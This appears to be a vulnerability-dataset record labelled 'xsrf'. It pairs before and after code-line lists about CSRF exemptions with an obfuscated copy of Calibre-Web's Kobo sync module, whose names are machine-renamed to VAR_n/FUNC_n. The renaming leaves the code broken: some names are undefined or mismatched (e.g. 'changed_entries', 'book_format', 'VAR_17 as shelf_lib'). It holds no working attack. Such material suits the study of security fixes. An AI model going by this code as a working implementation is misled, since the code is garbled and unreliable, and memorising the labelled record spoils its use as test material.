"category_featured_lists": "https://storeapi.kobo.com/v1/categories/{CategoryId}/featured",
"category_products": "https://storeapi.kobo.com/v1/categories/{CategoryId}/products",
"checkout_borrowed_book": "https://storeapi.kobo.com/v1/library/borrow",
"configuration_data": "https://storeapi.kobo.com/v1/configuration",
"content_access_book": "https://storeapi.kobo.com/v1/products/books/{ProductId}/access",
"customer_care_live_chat": "https://v2.zopim.com/widget/livechat.html?key=Y6gwUmnu4OATxN3Tli4Av9bYN319BTdO",
"daily_deal": "https://storeapi.kobo.com/v1/products/dailydeal",
"deals": "https://storeapi.kobo.com/v1/deals",
"delete_entitlement": "https://storeapi.kobo.com/v1/library/{Ids}",
"delete_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"delete_tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/items/delete",
"device_auth": "https://storeapi.kobo.com/v1/auth/device",
"device_refresh": "https://storeapi.kobo.com/v1/auth/refresh",
"dictionary_host": "https://kbdownload1-a.akamaihd.net",
"discovery_host": "https://discovery.kobobooks.com",
"eula_page": "https://www.kobo.com/termsofuse?style=onestore",
"exchange_auth": "https://storeapi.kobo.com/v1/auth/exchange",
"external_book": "https://storeapi.kobo.com/v1/products/books/external/{Ids}",
"facebook_sso_page": "https://authorize.kobo.com/signin/provider/Facebook/login?returnUrl=http://store.kobobooks.com/",
"featured_list": "https://storeapi.kobo.com/v1/products/featured/{FeaturedListId}",
"featured_lists": "https://storeapi.kobo.com/v1/products/featured",
"free_books_page": {
"EN": "https://www.kobo.com/{region}/{language}/p/free-ebooks",
"FR": "https://www.kobo.com/{region}/{language}/p/livres-gratuits",
"IT": "https://www.kobo.com/{region}/{language}/p/libri-gratuiti",
"NL": "https://www.kobo.com/{region}/{language}/List/bekijk-het-overzicht-van-gratis-ebooks/QpkkVWnUw8sxmgjSlCbJRg",
"PT": "https://www.kobo.com/{region}/{language}/p/livros-gratis",
},
"fte_feedback": "https://storeapi.kobo.com/v1/products/ftefeedback",
"get_tests_request": "https://storeapi.kobo.com/v1/analytics/gettests",
"giftcard_epd_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem-ereader",
"giftcard_redeem_url": "https://www.kobo.com/{storefront}/{language}/redeem",
"help_page": "https://www.kobo.com/help",
"kobo_audiobooks_enabled": "False",
"kobo_audiobooks_orange_deal_enabled": "False",
"kobo_audiobooks_subscriptions_enabled": "False",
"kobo_nativeborrow_enabled": "True",
"kobo_onestorelibrary_enabled": "False",
"kobo_redeem_enabled": "True",
"kobo_shelfie_enabled": "False",
"kobo_subscriptions_enabled": "False",
"kobo_superpoints_enabled": "False",
"kobo_wishlist_enabled": "True",
"library_book": "https://storeapi.kobo.com/v1/user/library/books/{LibraryItemId}",
"library_items": "https://storeapi.kobo.com/v1/user/library",
"library_metadata": "https://storeapi.kobo.com/v1/library/{Ids}/metadata",
"library_prices": "https://storeapi.kobo.com/v1/user/library/previews/prices",
"library_stack": "https://storeapi.kobo.com/v1/user/library/stacks/{LibraryItemId}",
"library_sync": "https://storeapi.kobo.com/v1/library/sync",
"love_dashboard_page": "https://store.kobobooks.com/{culture}/kobosuperpoints",
"love_points_redemption_page": "https://store.kobobooks.com/{culture}/KoboSuperPointsRedemption?productId={ProductId}",
"magazine_landing_page": "https://store.kobobooks.com/emagazines",
"notifications_registration_issue": "https://storeapi.kobo.com/v1/notifications/registration",
"oauth_host": "https://oauth.kobo.com",
"overdrive_account": "https://auth.overdrive.com/account",
"overdrive_library": "https://{libraryKey}.auth.overdrive.com/library",
"overdrive_library_finder_host": "https://libraryfinder.api.overdrive.com",
"overdrive_thunder_host": "https://thunder.api.overdrive.com",
"password_retrieval_page": "https://www.kobobooks.com/passwordretrieval.html",
"post_analytics_event": "https://storeapi.kobo.com/v1/analytics/event",
"privacy_page": "https://www.kobo.com/privacypolicy?style=onestore",
"product_nextread": "https://storeapi.kobo.com/v1/products/{ProductIds}/nextread",
"product_prices": "https://storeapi.kobo.com/v1/products/{ProductIds}/prices",
"product_recommendations": "https://storeapi.kobo.com/v1/products/{ProductId}/recommendations",
"product_reviews": "https://storeapi.kobo.com/v1/products/{ProductIds}/reviews",
"products": "https://storeapi.kobo.com/v1/products",
"provider_external_sign_in_page": "https://authorize.kobo.com/ExternalSignIn/{providerName}?returnUrl=http://store.kobobooks.com/",
"purchase_buy": "https://www.kobo.com/checkout/createpurchase/",
"purchase_buy_templated": "https://www.kobo.com/{culture}/checkout/createpurchase/{ProductId}",
"quickbuy_checkout": "https://storeapi.kobo.com/v1/store/quickbuy/{PurchaseId}/checkout",
"quickbuy_create": "https://storeapi.kobo.com/v1/store/quickbuy/purchase",
"rating": "https://storeapi.kobo.com/v1/products/{ProductId}/rating/{Rating}",
"reading_state": "https://storeapi.kobo.com/v1/library/{Ids}/state",
"redeem_interstitial_page": "https://store.kobobooks.com",
"registration_page": "https://authorize.kobo.com/signup?returnUrl=http://store.kobobooks.com/",
"related_items": "https://storeapi.kobo.com/v1/products/{Id}/related",
"remaining_book_series": "https://storeapi.kobo.com/v1/products/books/series/{SeriesId}",
"rename_tag": "https://storeapi.kobo.com/v1/library/tags/{TagId}",
"review": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}",
"review_sentiment": "https://storeapi.kobo.com/v1/products/reviews/{ReviewId}/sentiment/{Sentiment}",
"shelfie_recommendations": "https://storeapi.kobo.com/v1/user/recommendations/shelfie",
"sign_in_page": "https://authorize.kobo.com/signin?returnUrl=http://store.kobobooks.com/",
"social_authorization_host": "https://social.kobobooks.com:8443",
"social_host": "https://social.kobobooks.com",
"stacks_host_productId": "https://store.kobobooks.com/collections/byproductid/",
"store_home": "www.kobo.com/{region}/{language}",
"store_host": "store.kobobooks.com",
"store_newreleases": "https://store.kobobooks.com/{culture}/List/new-releases/961XUjtsU0qxkFItWOutGA",
"store_search": "https://store.kobobooks.com/{culture}/Search?Query={query}",
"store_top50": "https://store.kobobooks.com/{culture}/ebooks/Top",
"tag_items": "https://storeapi.kobo.com/v1/library/tags/{TagId}/Items",
"tags": "https://storeapi.kobo.com/v1/library/tags",
"taste_profile": "https://storeapi.kobo.com/v1/products/tasteprofile",
"update_accessibility_to_preview": "https://storeapi.kobo.com/v1/library/{EntitlementIds}/preview",
"use_one_store": "False",
"user_loyalty_benefits": "https://storeapi.kobo.com/v1/user/loyalty/benefits",
"user_platform": "https://storeapi.kobo.com/v1/user/platform",
"user_profile": "https://storeapi.kobo.com/v1/user/profile",
"user_ratings": "https://storeapi.kobo.com/v1/user/ratings",
"user_recommendations": "https://storeapi.kobo.com/v1/user/recommendations",
"user_reviews": "https://storeapi.kobo.com/v1/user/reviews",
"user_wishlist": "https://storeapi.kobo.com/v1/user/wishlist",
"userguide_host": "https://kbdownload1-a.akamaihd.net",
"wishlist_page": "https://store.kobobooks.com/{region}/{language}/account/wishlist",
}
| xsrf | {
"code": [
"from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub"
],
"line_no": [
50
]
} | {
"code": [
"from . import config, logger, kobo_auth, db, calibre_db, helper, shelf as shelf_lib, ub, csrf",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt",
"@csrf.exempt"
],
"line_no": [
51,
509,
599,
629,
989,
1000,
1034
]
} |
import base64
import datetime
import sys
import os
import uuid
from time import gmtime, strftime
try:
from urllib import unquote
except ImportError:
from urllib.parse import unquote
from flask import (
Blueprint,
request,
make_response,
jsonify,
current_app,
url_for,
redirect,
abort
)
from flask_login import current_user
from werkzeug.datastructures import Headers
from sqlalchemy import func
from sqlalchemy.sql.expression import and_, or_
from sqlalchemy.exc import StatementError
from sqlalchemy.sql import select
import requests
from . import config, logger, kobo_auth, db, calibre_db, helper, VAR_17 as shelf_lib, ub
from .constants import sqlalchemy_version2
from .helper import get_download_link
from .services import SyncToken as SyncToken
from .web import download_required
from .kobo_auth import requires_kobo_auth, get_auth_token
VAR_0 = {"KEPUB": ["KEPUB"], "EPUB": ["EPUB3", "EPUB"]}
VAR_1 = "https://storeapi.kobo.com"
VAR_2 = "https://kbimages1-a.akamaihd.net"
VAR_3 = 100
VAR_4 = Blueprint("kobo", __name__, url_prefix="/VAR_4/<auth_token>")
kobo_auth.disable_failed_auth_redirect_for_blueprint(VAR_4)
kobo_auth.register_url_value_preprocessor(VAR_4)
VAR_5 = logger.create()
def FUNC_0():
VAR_31, __, VAR_32 = request.full_path.rpartition("/VAR_4/")
VAR_31, __, VAR_33 = VAR_32.rstrip("?").partition(
"/"
)
return VAR_1 + "/" + VAR_33
VAR_6 = [
"connection",
"content-encoding",
"content-length",
"transfer-encoding",
]
def FUNC_1():
return config.config_kobo_sync
def FUNC_2(VAR_7=None):
VAR_34 = Headers(request.headers)
VAR_34.remove("Host")
if VAR_7:
VAR_7.set_kobo_store_header(VAR_34)
VAR_35 = requests.request(
method=request.method,
url=FUNC_0(),
headers=VAR_34,
data=request.get_data(),
allow_redirects=False,
timeout=(2, 10)
)
return VAR_35
def FUNC_3():
if config.config_kobo_proxy:
if request.method == "GET":
return redirect(FUNC_0(), 307)
else:
VAR_35 = FUNC_2()
VAR_78 = VAR_35.headers
for header_key in VAR_6:
VAR_78.pop(header_key, default=None)
return make_response(
VAR_35.content, VAR_35.status_code, VAR_78.items()
)
else:
return make_response(jsonify({}))
def FUNC_4(VAR_8):
try:
return VAR_8.strftime("%Y-%m-%dT%H:%M:%SZ")
except AttributeError as exc:
VAR_5.debug("Timestamp not valid: {}".format(exc))
return datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@VAR_4.route("/v1/library/sync")
@requires_kobo_auth
@download_required
def FUNC_5():
VAR_7 = SyncToken.SyncToken.from_headers(request.headers)
VAR_5.info("Kobo library sync request received.")
VAR_5.debug("SyncToken: {}".format(VAR_7))
if not current_app.wsgi_app.is_proxied:
VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
VAR_36 = VAR_7.books_last_modified
VAR_37 = VAR_7.books_last_created
VAR_38 = VAR_7.reading_state_last_modified
VAR_39 = datetime.datetime.min
VAR_9 = []
calibre_db.reconnect_db(config, ub.app_DB_path)
VAR_18 = current_user.kobo_only_shelves_sync
if VAR_18:
if sqlalchemy_version2:
VAR_64 = select(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
else:
VAR_64 = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.BookShelf.date_added,
ub.ArchivedBook.is_archived)
VAR_64 = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(ub.BookShelf.date_added > VAR_7.books_last_modified) #?? or also or from above
.filter(db.Data.format.in_(VAR_0))
.filter(calibre_db.common_filters())
.order_by(db.Books.id)
.order_by(ub.ArchivedBook.last_modified)
.join(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)
.join(ub.Shelf)
.filter(ub.Shelf.user_id == current_user.id)
.filter(ub.Shelf.kobo_sync)
.distinct()
)
else:
if sqlalchemy_version2:
VAR_64 = select(db.Books, ub.ArchivedBook.last_modified, ub.ArchivedBook.is_archived)
else:
VAR_64 = calibre_db.session.query(db.Books,
ub.ArchivedBook.last_modified,
ub.ArchivedBook.is_archived)
VAR_64 = (changed_entries
.join(db.Data).outerjoin(ub.ArchivedBook, db.Books.id == ub.ArchivedBook.book_id)
.join(ub.KoboSyncedBooks, ub.KoboSyncedBooks.book_id == db.Books.id, isouter=True)
.filter(or_(ub.KoboSyncedBooks.user_id != current_user.id,
ub.KoboSyncedBooks.book_id == None))
.filter(calibre_db.common_filters())
.filter(db.Data.format.in_(VAR_0))
.order_by(db.Books.last_modified)
.order_by(db.Books.id)
)
VAR_40 = []
if sqlalchemy_version2:
VAR_65 = calibre_db.session.execute(VAR_64.limit(VAR_3))
else:
VAR_65 = VAR_64.limit(VAR_3)
for VAR_12 in VAR_65:
FUNC_27(VAR_12.Books.id)
VAR_66 = [data.format for data in VAR_12.Books.data]
if not 'KEPUB' in VAR_66 and config.config_kepubifypath and 'EPUB' in VAR_66:
helper.convert_book_format(VAR_12.Books.id, config.config_calibre_dir, 'EPUB', 'KEPUB', current_user.name)
VAR_22 = FUNC_28(VAR_12.Books.id)
VAR_67 = {
"BookEntitlement": FUNC_9(VAR_12.Books, VAR_14=(VAR_12.is_archived == True)),
"BookMetadata": FUNC_16(VAR_12.Books),
}
if VAR_22.last_modified > VAR_7.reading_state_last_modified:
VAR_67["ReadingState"] = FUNC_29(VAR_12.Books, VAR_22)
VAR_38 = max(VAR_38, VAR_22.last_modified)
VAR_40.append(VAR_12.Books.id)
VAR_68 = VAR_12.Books.timestamp
try:
VAR_68 = max(VAR_68, VAR_12.date_added)
except AttributeError:
pass
if VAR_68 > VAR_7.books_last_created:
VAR_9.append({"NewEntitlement": VAR_67})
else:
VAR_9.append({"ChangedEntitlement": VAR_67})
VAR_36 = max(
VAR_12.Books.last_modified, VAR_36
)
try:
VAR_36 = max(
VAR_36, VAR_12.date_added
)
except AttributeError:
pass
VAR_37 = max(VAR_68, VAR_37)
if sqlalchemy_version2:
VAR_41 = calibre_db.session.execute(VAR_64
.filter(ub.ArchivedBook.is_archived)
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()))\
.columns(db.Books).first()
else:
VAR_41 = VAR_64.from_self().filter(ub.ArchivedBook.is_archived) \
.order_by(func.datetime(ub.ArchivedBook.last_modified).desc()).first()
VAR_41 = max_change.last_modified if VAR_41 else VAR_39
VAR_39 = max(VAR_39, VAR_41)
if sqlalchemy_version2:
VAR_69 = calibre_db.session.execute(VAR_64).all()
VAR_70 = len(VAR_69)
else:
VAR_70 = VAR_64.count()
VAR_5.debug("Remaining VAR_65 to Sync: {}".format(VAR_70))
VAR_42 = ub.session.query(ub.KoboReadingState)
if VAR_18:
VAR_42 = VAR_42.join(ub.BookShelf,
ub.KoboReadingState.book_id == ub.BookShelf.book_id)\
.join(ub.Shelf)\
.filter(current_user.id == ub.Shelf.user_id)\
.filter(ub.Shelf.kobo_sync,
or_(
func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified,
func.datetime(ub.BookShelf.date_added) > VAR_7.books_last_modified
)).distinct()
else:
VAR_42 = VAR_42.filter(
func.datetime(ub.KoboReadingState.last_modified) > VAR_7.reading_state_last_modified)
VAR_42 = VAR_42.filter(
and_(ub.KoboReadingState.user_id == current_user.id,
ub.KoboReadingState.book_id.notin_(VAR_40)))
for VAR_22 in VAR_42.all():
VAR_12 = calibre_db.session.query(db.Books).filter(db.Books.id == VAR_22.book_id).one_or_none()
if VAR_12:
VAR_9.append({
"ChangedReadingState": {
"ReadingState": FUNC_29(VAR_12, VAR_22)
}
})
VAR_38 = max(VAR_38, VAR_22.last_modified)
FUNC_22(VAR_7, VAR_9, VAR_18)
VAR_7.books_last_created = VAR_37
VAR_7.books_last_modified = VAR_36
VAR_7.archive_last_modified = VAR_39
VAR_7.reading_state_last_modified = VAR_38
return FUNC_6(VAR_7, VAR_9, VAR_70)
def FUNC_6(VAR_7, VAR_9, VAR_10=False):
VAR_43 = {}
if config.config_kobo_proxy:
try:
VAR_35 = FUNC_2(VAR_7)
VAR_79 = VAR_35.json()
VAR_9 += VAR_79
VAR_7.merge_from_store_response(VAR_35)
VAR_43["x-VAR_4-sync"] = VAR_35.headers.get("x-VAR_4-sync")
VAR_43["x-VAR_4-sync-mode"] = VAR_35.headers.get("x-VAR_4-sync-mode")
VAR_43["x-VAR_4-recent-reads"] = VAR_35.headers.get("x-VAR_4-recent-reads")
except Exception as ex:
VAR_5.error("Failed to receive or parse VAR_44 from Kobo's sync endpoint: {}".format(ex))
if VAR_10:
VAR_43["x-VAR_4-sync"] = "continue"
VAR_7.to_headers(VAR_43)
VAR_44 = make_response(jsonify(VAR_9), VAR_43)
return VAR_44
@VAR_4.route("/v1/library/<VAR_11>/metadata")
@requires_kobo_auth
@download_required
def FUNC_7(VAR_11):
if not current_app.wsgi_app.is_proxied:
VAR_5.debug('Kobo: Received unproxied request, changed request port to external server port')
VAR_5.info("Kobo library VAR_45 request received for VAR_12 %s" % VAR_11)
VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
if not VAR_12 or not VAR_12.data:
VAR_5.info(u"Book %s not found in database", VAR_11)
return FUNC_3()
VAR_45 = FUNC_16(VAR_12)
return jsonify([VAR_45])
def FUNC_8(VAR_12, VAR_13):
if not current_app.wsgi_app.is_proxied:
if ':' in request.host and not request.host.endswith(']'):
VAR_80 = "".join(request.host.split(':')[:-1])
else:
VAR_80 = request.host
return "{url_scheme}://{url_base}:{url_port}/VAR_4/{auth_token}/download/{VAR_21}/{VAR_13}".format(
url_scheme=request.scheme,
url_base=VAR_80,
url_port=config.config_external_port,
auth_token=get_auth_token(),
VAR_21=VAR_12.id,
VAR_13=book_format.lower()
)
return url_for(
"kobo.download_book",
auth_token=kobo_auth.get_auth_token(),
VAR_21=VAR_12.id,
VAR_13=book_format.lower(),
_external=True,
)
def FUNC_9(VAR_12, VAR_14):
VAR_11 = VAR_12.uuid
return {
"Accessibility": "Full",
"ActivePeriod": {"From": FUNC_4(datetime.datetime.now())},
"Created": FUNC_4(VAR_12.timestamp),
"CrossRevisionId": VAR_11,
"Id": VAR_11,
"IsRemoved": VAR_14,
"IsHiddenFromArchive": False,
"IsLocked": False,
"LastModified": FUNC_4(VAR_12.last_modified),
"OriginCategory": "Imported",
"RevisionId": VAR_11,
"Status": "Active",
}
def FUNC_10():
return strftime("%Y-%m-%dT%H:%M:%SZ", gmtime())
def FUNC_11(VAR_12):
if not VAR_12.comments:
return None
return VAR_12.comments[0].text
def FUNC_12(VAR_12):
if not VAR_12.authors:
return {"Contributors": None}
if len(VAR_12.authors) > 1:
VAR_71 = []
VAR_72 = []
for author in VAR_12.authors:
VAR_72.append({"Name":author.name, "Role":"Author"})
VAR_71.append(author.name)
return {"ContributorRoles": VAR_72, "Contributors":VAR_71}
return {"ContributorRoles": [{"Name":VAR_12.authors[0].name, "Role":"Author"}], "Contributors": VAR_12.authors[0].name}
def FUNC_13(VAR_12):
if not VAR_12.publishers:
return None
return VAR_12.publishers[0].name
def FUNC_14(VAR_12):
if not VAR_12.series:
return None
return VAR_12.series[0].name
def FUNC_15(VAR_12):
return VAR_12.series_index or 1
def FUNC_16(VAR_12):
VAR_46 = []
VAR_47 = [data for data in VAR_12.data if data.format == 'KEPUB']
for book_data in VAR_47 if len(VAR_47) > 0 else VAR_12.data:
if book_data.format not in VAR_0:
continue
for kobo_format in VAR_0[book_data.format]:
VAR_46.append(
{
"Format": kobo_format,
"Size": book_data.uncompressed_size,
"Url": FUNC_8(VAR_12, book_data.format),
"Platform": "Generic",
}
)
VAR_11 = VAR_12.uuid
VAR_45 = {
"Categories": ["00000000-0000-0000-0000-000000000001", ],
"CoverImageId": VAR_11,
"CrossRevisionId": VAR_11,
"CurrentDisplayPrice": {"CurrencyCode": "USD", "TotalAmount": 0},
"CurrentLoveDisplayPrice": {"TotalAmount": 0},
"Description": FUNC_11(VAR_12),
"DownloadUrls": VAR_46,
"EntitlementId": VAR_11,
"ExternalIds": [],
"Genre": "00000000-0000-0000-0000-000000000001",
"IsEligibleForKoboLove": False,
"IsInternetArchive": False,
"IsPreOrder": False,
"IsSocialEnabled": True,
"Language": "en",
"PhoneticPronunciations": {},
"PublicationDate": VAR_12.pubdate,
"Publisher": {"Imprint": "", "Name": FUNC_13(VAR_12),},
"RevisionId": VAR_11,
"Title": VAR_12.title,
"WorkId": VAR_11,
}
VAR_45.update(FUNC_12(VAR_12))
if FUNC_14(VAR_12):
if sys.version_info < (3, 0):
VAR_48 = FUNC_14(VAR_12).encode("utf-8")
else:
VAR_48 = FUNC_14(VAR_12)
VAR_45["Series"] = {
"Name": FUNC_14(VAR_12),
"Number": FUNC_15(VAR_12), # ToDo Check int() ?
"NumberFloat": float(FUNC_15(VAR_12)),
"Id": uuid.uuid3(uuid.NAMESPACE_DNS, VAR_48),
}
return VAR_45
@VAR_4.route("/v1/library/tags", methods=["POST", "DELETE"])
@requires_kobo_auth
def FUNC_17():
if request.method == "DELETE":
abort(405)
VAR_48, VAR_16 = None, None
try:
VAR_73 = request.json
VAR_48 = VAR_73["Name"]
VAR_16 = VAR_73["Items"]
if not VAR_48:
raise TypeError
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags request.")
abort(400, description="Malformed tags POST request. Data has empty 'Name', missing 'Name' or 'Items' field")
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.name == VAR_48, ub.Shelf.user_id ==
current_user.id).one_or_none()
if VAR_17 and not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to create VAR_17.")
if not VAR_17:
VAR_17 = ub.Shelf(user_id=current_user.id, VAR_48=name, uuid=str(uuid.uuid4()))
ub.session.add(VAR_17)
VAR_49 = FUNC_19(VAR_16, VAR_17)
if VAR_49:
VAR_5.debug("Received request to add unknown VAR_65 to a collection. Silently ignoring VAR_16.")
ub.session_commit()
return make_response(jsonify(str(VAR_17.uuid)), 201)
@VAR_4.route("/v1/library/tags/<VAR_15>", methods=["DELETE", "PUT"])
@requires_kobo_auth
def FUNC_18(VAR_15):
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
ub.Shelf.user_id == current_user.id).one_or_none()
if not VAR_17:
VAR_5.debug("Received Kobo VAR_53 update request on a collection unknown to CalibreWeb")
if config.config_kobo_proxy:
return FUNC_3()
else:
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to edit VAR_17.")
if request.method == "DELETE":
shelf_lib.delete_shelf_helper(VAR_17)
else:
VAR_48 = None
try:
VAR_73 = request.json
VAR_48 = VAR_73["Name"]
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags rename request.")
abort(400, description="Malformed tags POST request. Data is missing 'Name' field")
VAR_17.name = VAR_48
ub.session.merge(VAR_17)
ub.session_commit()
return make_response(' ', 200)
def FUNC_19(VAR_16, VAR_17):
VAR_50 = set([book_shelf.book_id for book_shelf in VAR_17.books])
VAR_49 = []
for item in VAR_16:
try:
if item["Type"] != "ProductRevisionTagItem":
VAR_49.append(item)
continue
VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
if not VAR_12:
VAR_49.append(item)
continue
VAR_21 = VAR_12.id
if VAR_21 not in VAR_50:
VAR_17.books.append(ub.BookShelf(VAR_21=book_id))
except KeyError:
VAR_49.append(item)
return VAR_49
@VAR_4.route("/v1/library/tags/<VAR_15>/items", methods=["POST"])
@requires_kobo_auth
def FUNC_20(VAR_15):
VAR_16 = None
try:
VAR_74 = request.json
VAR_16 = VAR_74["Items"]
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
ub.Shelf.user_id == current_user.id).one_or_none()
if not VAR_17:
VAR_5.debug("Received Kobo request on a collection unknown to CalibreWeb")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to edit VAR_17.")
VAR_49 = FUNC_19(VAR_16, VAR_17)
if VAR_49:
VAR_5.debug("Received request to add an unknown VAR_12 to a collection. Silently ignoring item.")
ub.session.merge(VAR_17)
ub.session_commit()
return make_response('', 201)
@VAR_4.route("/v1/library/tags/<VAR_15>/VAR_16/delete", methods=["POST"])
@requires_kobo_auth
def FUNC_21(VAR_15):
VAR_16 = None
try:
VAR_74 = request.json
VAR_16 = VAR_74["Items"]
except (KeyError, TypeError):
VAR_5.debug("Received malformed v1/library/tags/<VAR_15>/VAR_16/delete request.")
abort(400, description="Malformed tags POST request. Data is missing 'Items' field")
VAR_17 = ub.session.query(ub.Shelf).filter(ub.Shelf.uuid == VAR_15,
ub.Shelf.user_id == current_user.id).one_or_none()
if not VAR_17:
VAR_5.debug(
"Received a request to remove an item from a Collection unknown to CalibreWeb.")
abort(404, description="Collection isn't known to CalibreWeb")
if not shelf_lib.check_shelf_edit_permissions(VAR_17):
abort(401, description="User is unauthaurized to edit VAR_17.")
VAR_49 = []
for item in VAR_16:
try:
if item["Type"] != "ProductRevisionTagItem":
VAR_49.append(item)
continue
VAR_12 = calibre_db.get_book_by_uuid(item["RevisionId"])
if not VAR_12:
VAR_49.append(item)
continue
VAR_17.books.filter(ub.BookShelf.book_id == VAR_12.id).delete()
except KeyError:
VAR_49.append(item)
ub.session_commit()
if VAR_49:
VAR_5.debug("Received request to remove an unknown VAR_12 to a collecition. Silently ignoring item.")
return make_response('', 200)
def FUNC_22(VAR_7, VAR_9, VAR_18=False):
VAR_51 = VAR_7.tags_last_modified
for VAR_17 in ub.session.query(ub.ShelfArchive).filter(
func.datetime(ub.ShelfArchive.last_modified) > VAR_7.tags_last_modified,
ub.ShelfArchive.user_id == current_user.id
):
VAR_51 = max(VAR_17.last_modified, VAR_51)
VAR_9.append({
"DeletedTag": {
"Tag": {
"Id": VAR_17.uuid,
"LastModified": FUNC_4(VAR_17.last_modified)
}
}
})
VAR_52 = []
if VAR_18:
for VAR_17 in ub.session.query(ub.Shelf).filter(
func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
ub.Shelf.user_id == current_user.id,
not ub.Shelf.kobo_sync
):
VAR_9.append({
"DeletedTag": {
"Tag": {
"Id": VAR_17.uuid,
"LastModified": FUNC_4(VAR_17.last_modified)
}
}
})
VAR_52.append(ub.Shelf.kobo_sync)
if sqlalchemy_version2:
VAR_75 = ub.session.execute(select(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*VAR_52
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())).columns(ub.Shelf)
else:
VAR_75 = ub.session.query(ub.Shelf).outerjoin(ub.BookShelf).filter(
or_(func.datetime(ub.Shelf.last_modified) > VAR_7.tags_last_modified,
func.datetime(ub.BookShelf.date_added) > VAR_7.tags_last_modified),
ub.Shelf.user_id == current_user.id,
*VAR_52
).distinct().order_by(func.datetime(ub.Shelf.last_modified).asc())
for VAR_17 in VAR_75:
if not shelf_lib.check_shelf_view_permissions(VAR_17):
continue
VAR_51 = max(VAR_17.last_modified, VAR_51)
VAR_53 = FUNC_23(VAR_17)
if not VAR_53:
continue
if VAR_17.created > VAR_7.tags_last_modified:
VAR_9.append({
"NewTag": VAR_53
})
else:
VAR_9.append({
"ChangedTag": VAR_53
})
VAR_7.tags_last_modified = VAR_51
ub.session_commit()
def FUNC_23(VAR_17):
VAR_53 = {
"Created": FUNC_4(VAR_17.created),
"Id": VAR_17.uuid,
"Items": [],
"LastModified": FUNC_4(VAR_17.last_modified),
"Name": VAR_17.name,
"Type": "UserTag"
}
for book_shelf in VAR_17.books:
VAR_12 = calibre_db.get_book(book_shelf.book_id)
if not VAR_12:
VAR_5.info(u"Book (id: %s) in BookShelf (id: %s) not found in VAR_12 database", book_shelf.book_id, VAR_17.id)
continue
VAR_53["Items"].append(
{
"RevisionId": VAR_12.uuid,
"Type": "ProductRevisionTagItem"
}
)
return {"Tag": VAR_53}
@VAR_4.route("/v1/library/<VAR_11>/state", methods=["GET", "PUT"])
@requires_kobo_auth
def FUNC_24(VAR_11):
VAR_12 = calibre_db.get_book_by_uuid(VAR_11)
if not VAR_12 or not VAR_12.data:
VAR_5.info(u"Book %s not found in database", VAR_11)
return FUNC_3()
VAR_22 = FUNC_28(VAR_12.id)
if request.method == "GET":
return jsonify([FUNC_29(VAR_12, VAR_22)])
else:
VAR_76 = {"EntitlementId": VAR_11}
try:
VAR_81 = request.json
VAR_82 = VAR_81["ReadingStates"][0]
VAR_83 = VAR_82["CurrentBookmark"]
if VAR_83:
VAR_25 = VAR_22.current_bookmark
VAR_25.progress_percent = VAR_83["ProgressPercent"]
VAR_25.content_source_progress_percent = VAR_83["ContentSourceProgressPercent"]
VAR_87 = VAR_83["Location"]
if VAR_87:
VAR_25.location_value = VAR_87["Value"]
VAR_25.location_type = VAR_87["Type"]
VAR_25.location_source = VAR_87["Source"]
VAR_76["CurrentBookmarkResult"] = {"Result": "Success"}
VAR_84 = VAR_82["Statistics"]
if VAR_84:
VAR_24 = VAR_22.statistics
VAR_24.spent_reading_minutes = int(VAR_84["SpentReadingMinutes"])
VAR_24.remaining_time_minutes = int(VAR_84["RemainingTimeMinutes"])
VAR_76["StatisticsResult"] = {"Result": "Success"}
VAR_85 = VAR_82["StatusInfo"]
if VAR_85:
VAR_23 = VAR_22.book_read_link
VAR_88 = FUNC_26(VAR_85["Status"])
if VAR_88 == ub.ReadBook.STATUS_IN_PROGRESS \
and VAR_88 != VAR_23.read_status:
VAR_23.times_started_reading += 1
VAR_23.last_time_started_reading = datetime.datetime.utcnow()
VAR_23.read_status = VAR_88
VAR_76["StatusInfoResult"] = {"Result": "Success"}
except (KeyError, TypeError, ValueError, StatementError):
VAR_5.debug("Received malformed v1/library/<VAR_11>/state request.")
ub.session.rollback()
abort(400, description="Malformed request data is missing 'ReadingStates' key")
ub.session.merge(VAR_22)
ub.session_commit()
return jsonify({
"RequestResult": "Success",
"UpdateResults": [VAR_76],
})
